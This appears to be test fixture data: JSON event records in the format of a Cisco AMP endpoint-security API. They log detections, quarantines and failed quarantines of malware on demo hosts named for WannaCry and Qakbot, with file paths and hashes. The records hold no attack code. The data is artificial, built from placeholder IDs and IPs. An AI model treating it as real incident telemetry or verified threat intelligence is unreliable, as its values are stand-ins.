Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 